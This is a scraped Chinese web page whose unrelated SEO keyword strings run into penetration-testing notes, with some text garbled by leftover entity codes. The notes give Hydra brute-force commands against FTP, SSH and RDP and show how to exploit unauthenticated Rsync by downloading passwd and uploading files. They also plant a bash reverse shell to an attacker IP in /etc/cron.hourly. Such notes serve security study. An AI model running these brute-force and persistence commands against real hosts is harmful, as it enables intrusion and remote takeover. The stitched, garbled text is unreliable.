网站开发费的税率是多少,无锡网站推广优化,有了域名之后如何做网站,网页优化文章目录 口令猜解——Hydra-FTPRDPSSH配置不当——未授权访问—Rsync文件备份协议漏洞——应用软件-FTPProftpd搭建 口令猜解——Hydra-FTPRDPSSH
FTP#xff1a;文本传输协议#xff0c;端口21#xff1b;RDP#xff1a;windows上远程终端协议… 文章目录 口令猜解——Hydra-FTPRDPSSH配置不当——未授权访问—Rsync文件备份协议漏洞——应用软件-FTPProftpd搭建 口令猜解——Hydra-FTPRDPSSH
FTP文本传输协议端口21RDPwindows上远程终端协议端口3389SSHlinux远程终端协议端口22。
hydra -L test -P 10top1K.txt ip地址 ftp -V
hydra -l root -P 10top1K.txt ip地址 ssh -V
hydra -l administrator -P 10top1K.txt ip地址 rdp -V密码项目fuzzDicts
配置不当——未授权访问—Rsync文件备份
Rsynclinux文件同步的应用程序常用于本地计算机和远程计算机之间文件同步端口873。
判断是否存在Rsync未授权访问rsync rsync://ip:port/ 出现上述信息说明存在rsync未授权访问。 利用 读取文件rsync rsync://ip:port/src/下载文件rsync rsync://ip:port/src/passwd ./上传文件rsync -av passwd rsync://ip:port/src/tmp/passwd 反弹shell借助系统计划任务 获取信息rsync rsync://ip:port/src/etc/crontab /root/cron.txt(下载到本地查看)本地创建后门文件 touch shell //创建文件//文件内容
/bin/bash -i /dev/tcp/攻击机ip:port 01chmod x shell //修改文件权限上传文件rsync -av shell rsync://ip:port/src/etc/cron.hourly上传到可利用的计划任务中
fofa爬虫fofa_viewer
协议漏洞——应用软件-FTPProftpd搭建
Proftpd用于架设ftp服务。
